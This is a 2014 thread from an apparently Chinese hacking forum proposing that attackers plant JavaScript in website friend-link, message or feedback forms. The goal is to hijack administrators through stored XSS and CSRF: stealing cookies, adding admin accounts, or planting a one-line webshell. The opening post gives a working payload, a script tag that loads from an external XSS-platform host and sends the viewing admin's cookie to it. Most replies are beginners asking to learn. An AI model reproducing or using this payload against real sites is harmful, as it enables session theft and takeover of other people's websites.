你这样做，何不如CSRF？

STSASG · 发表于 2014-8-14 10:06:58

原帖地址：http://www.ihonker.org/thread-3271-1-4.html

看了贴，我才知道这位仁兄可能不了解CSRF这么个好东西

从友情链接或者站内信以及留言反馈的地方，通过CSRF拿到后台或者拿到管理员账号密码早已不是新鲜事了。

我只是来提醒一下的

====================================================

比如：我们在友情链接申请的地方，放上一段JS，使得管理员点击（甚至都不用点击），鼠标移动上来

或者打开页面，就能触发xss

1.xss直接获取cookie

2.CSRF 发送cookie

3.CSRF 添加管理员

4.CSRF 生成一句话

5.CSRF 多了去了

例如直接拿cookie：

</textarea>'"><script src=http://x.xxoo.cc/8OTSbY?1407981679></script>

这是xss平台的代码，cookie值会发送到平台地址x.xxoo.cc对应的用户去。

乌云很多CSRF的组合拳应用，有个朋友出了一套组合拳

http://www.wooyun.org/bugs/wooyun-2014-071680

phantomer · 发表于 2014-8-14 10:45:15

乌云的那个洞目前还看不了

契约 · 发表于 2014-8-14 11:53:56

楼主的这个方法不错，可惜俺小白不会构造JS语句，这是蛋疼的地方啊

90_ · 发表于 2014-8-14 12:37:52

要利用CSRF，首先要存在CSRF

qianxi · 发表于 2014-8-14 13:17:19

个人表示还不会csrf，求大牛指点

STSASG · 发表于 2014-8-14 17:06:52

90_ 发表于 2014-8-14 12:37
要利用CSRF，首先要存在CSRF

当然，这也需要一定的条件。

条件不支持，这条路也行不通

话说论坛的表情能换点新鲜的吗？

总是这几个表情

hydra · 发表于 2014-8-15 15:45:54

学习一下，看帖就要回复，

By_小颜 · 发表于 2014-8-17 21:34:49

楼主的这个方法不错，可惜俺小白不会构造JS语句，这是蛋疼的地方啊

蟹老板 · 发表于 2014-8-18 01:26:25

XSS盲打

mlbzssk · 发表于 2014-8-18 20:42:23

我是电脑小白，打酱油的，路过学习

你这样做，何不如CSRF？

点评

指导单位

旗下站点

联系我们